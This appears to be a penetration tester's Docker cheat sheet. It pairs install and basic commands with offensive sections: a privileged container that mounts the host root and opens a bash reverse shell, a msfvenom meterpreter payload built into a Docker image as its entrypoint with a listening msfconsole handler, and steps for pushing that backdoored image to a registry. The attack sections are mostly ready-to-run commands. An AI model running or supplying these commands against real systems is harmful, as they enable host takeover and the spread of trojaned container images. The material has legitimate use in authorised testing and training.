######
Docker
######

*******
Install
*******

.. code-block:: bash

  # Community Edition - Stable
  curl -fsSL https://get.docker.com -o get-docker.sh
  sh get-docker.sh 

  # For KALI
  curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
  echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
  sudo apt-get update && sudo apt-get install -y docker-ce

  # Add user to docker group in order to call docker without sudo
  sudo usermod -a -G docker $(whoami)

******
Basics
******

.. code-block:: bash

  # Retrieve image from internet 
  sudo docker pull ubuntu

  # Run container with autoremove on exit
  sudo docker run --rm -it debian
  sudo docker run --rm -it debian cat /etc/issue
  sudo docker run --rm -it debian sh -c 'cat /etc/issue && hostname'

  # Running containers
  sudo docker ps -a

  # Stop and remove container with id from docker ps -a
  sudo docker stop ID
  sudo docker rm ID

  # List local images
  sudo docker images

  # Remove local image
  sudo docker rmi debian

  # Commit container to image
  docker commit c3f279d17e0a customdebian:latest

  # Export image to disk
  sudo docker save customdebian | gzip > customdebian.tar.gz

  # Get current stats
  sudo docker stats

  # Inspect container or image details
  sudo docker inspect debian

*******
PrivEsc
*******

.. code-block:: bash

  # Run debian container with privileges
  sudo docker run --entrypoint='' --rm -v "/:/vm" --net=host --privileged=true debian:latest bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"

***************
Malicious Image
***************

.. code-block:: bash

  $ msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -e x64/xor_dynamic -i3 LHOST=1.2.3.4 LPORT=4444 > BIN
  $ cat <<EOF > Dockerfile
  FROM debian:latest
  COPY ./BIN /
  RUN chmod 755 /BIN
  ENTRYPOINT [""]
  CMD ["/BIN"]
  EOF
  
  $ docker build . -t pwn

| Listen for reverse meterpreter shell

.. code-block:: bash

  sudo msfconsole -x '
  use exploit/multi/handler ;
  set PAYLOAD linux/x64/meterpreter/reverse_tcp ;
  set LHOST 0.0.0.0 ;
  set LPORT 4444 ;
  run -j

********
Registry
********

| Port 5000 by default

.. code-block:: bash

  $ curl http://dockerregistry:5000/v2/_catalog
  {"repositories":["debian","nginx","postgres"]}


| You need to declare any unsecure http registry, restart to apply (service docker restart)

.. code-block:: bash

  $ cat <<EOF > /etc/docker/daemon.json
  {
    "insecure-registries": ["dockerregistry:5000"]
  }
  EOF

| Push image to distant registry

.. code-block:: bash

  docker tag pwn dockermalicious:5000/pwn
  docker push dockermalicious:5000/pwn

| Download distant image to you local docker images

.. code-block:: bash

  docker pull dockerregistry:5000/containerlambda

| Export from local docker images to tar file

.. code-block:: bash

  docker save dockerregistry:5000/containerlambda -o containerlambda.tar

| Extract container image layers to a new folder

.. code-block:: bash

  mkdir containerlambda imagecontent
  tar -xvf containerlambda.tar -C containerlambda
  find containerlambda -type f -name "*tar" -exec tar -xvf {} -C imagecontent \;




